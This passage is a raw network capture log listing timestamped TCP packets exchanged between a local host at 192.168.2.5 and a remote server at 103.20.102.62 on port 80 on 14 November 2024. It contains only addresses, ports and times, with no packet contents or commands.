                                                                                        Nov 14, 2024 08:15:35.624710083 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.624728918 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.624736071 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.624752045 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.624788046 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.624823093 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.624867916 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.624922991 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.624943972 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.624996901 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625019073 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625051022 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.625052929 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625071049 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625082970 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.625089884 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625103951 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.625111103 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625129938 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625165939 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625189066 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.625232935 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625250101 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625281096 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.625283957 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625318050 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625324011 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.625360012 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.625376940 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625437021 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625468016 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625508070 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.625529051 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625550985 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625583887 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625603914 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625608921 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.625634909 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.625648022 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625689030 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625731945 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625776052 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625808001 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.625849962 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625871897 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625902891 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.625904083 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625921965 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625930071 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.625938892 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625940084 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.625962019 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625971079 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.625979900 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.625999928 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626055956 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626116037 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626147032 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.626152992 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626195908 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.626220942 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626226902 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.626240015 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626286030 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626321077 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.626339912 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626385927 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626414061 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626447916 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.626473904 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626475096 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.626497030 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626539946 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626581907 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626617908 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.626657009 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626678944 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626714945 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626733065 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626733065 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.626733065 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.626758099 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626791954 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.626810074 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626869917 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626890898 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.626890898 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626909971 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626926899 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626938105 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.626945019 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626962900 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.626975060 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.627005100 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.627043009 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.627047062 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.627085924 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.627103090 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.627120972 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.627129078 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.627139091 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.627146006 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.627156973 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.627197981 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.627216101 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.627245903 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.627249956 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.627266884 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.627279043 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.627285004 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.627301931 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.627301931 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.627341986 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.627343893 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.627362013 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.627394915 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.627414942 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.627419949 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.627440929 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.670342922 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.740273952 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740310907 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740335941 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740354061 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740372896 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740406990 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740441084 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740463972 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.740509987 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740550995 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740569115 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740601063 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.740662098 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740672112 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.740684032 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740700006 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.740701914 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740719080 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740737915 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740797043 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.740931034 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740940094 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740956068 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740963936 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740972042 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740981102 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.740995884 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741002083 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741008043 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741008997 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.741013050 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741019964 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741046906 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.741056919 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741063118 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741090059 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.741133928 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.741183996 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741190910 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741200924 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741206884 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741214037 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741219997 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741230965 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741236925 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741241932 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741247892 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741259098 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741277933 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.741277933 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.741288900 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.741415977 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741425037 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741452932 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741458893 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741471052 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741477013 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.741504908 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.741555929 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741563082 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741589069 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.741630077 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741636992 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741647005 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741653919 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741658926 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741664886 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.741666079 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741688967 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.741703987 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.741846085 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741852045 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741863012 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.741902113 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.742006063 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742012978 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742023945 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742029905 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742085934 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.742085934 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.742161989 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742167950 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742180109 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742186069 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742192030 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742197037 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742208958 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742213011 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742223024 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.742223024 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742247105 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.742259026 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.742302895 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742309093 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742328882 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742345095 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742352962 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742362976 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742368937 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742369890 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.742393970 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.742408037 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.742588997 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742594004 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742604971 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742610931 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742615938 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742621899 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742631912 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742643118 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.742752075 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742765903 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742779016 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742784977 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742796898 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742810965 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.742940903 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742948055 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742959023 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742964983 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742971897 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742976904 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.742984056 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.742991924 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.743006945 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.743019104 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.743036985 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.743165016 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.743170977 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.743181944 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.743189096 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.743194103 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.743200064 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.743211985 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.743216991 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.743222952 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.743242025 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.743257046 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.743297100 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.897402048 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.897754908 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.897789001 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.897809029 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.897845030 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.897866964 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.897902012 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.897902012 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.897903919 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.897949934 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.898514032 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.898555040 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.898574114 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.898591042 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.898591042 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.898613930 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.898619890 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.898659945 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.898668051 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.898716927 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.898758888 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.898802996 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.898803949 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.898861885 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.898906946 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.898962975 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899033070 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.899034023 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899075985 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899094105 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899203062 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899221897 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899235964 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.899259090 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.899286032 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899308920 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899401903 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899452925 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899460077 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.899497032 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899511099 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.899561882 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.899600029 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899640083 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899655104 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899671078 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899694920 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.899693966 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899724960 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.899745941 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899790049 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899842978 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899888039 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899903059 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899907112 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.899920940 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899926901 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.899945021 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.899964094 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.899977922 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.900012016 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.900027990 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.900044918 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.900089979 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.900151014 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:35.900182009 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:35.900199890 CET8049704103.20.102.62192.168.2.5
